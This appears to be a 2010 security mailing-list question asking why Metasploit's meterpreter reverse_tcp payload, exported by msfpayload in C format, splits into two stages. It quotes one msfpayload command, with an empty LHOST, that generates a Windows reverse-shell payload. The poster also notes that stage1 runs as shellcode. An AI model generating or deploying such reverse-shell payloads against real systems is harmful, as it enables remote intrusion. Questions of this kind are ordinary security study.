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What is the output of msfpayload in C format

From: eski mo <eskimo.ganges () gmail com>
Date: Mon, 6 Sep 2010 02:10:26 -0700

When i do following
msfpayload windows/meterpreter/reverse_tcp LHOST= C > /meter.c

the o/p buffer of meter.c is of two parts stage1 and stage2 .

Now this is bit confusing , few questions
1. meterpreter is 2 stage (multi) rite  ? what is stage1 ?
2. why 2 diff stage opcodes?
3. i try running stage1 it works (run in same way of a shellcode
routines ) but stage2 doesnot.

I know sourcecode will reveal me these answers , just looking for some
quick bites or bytes ...


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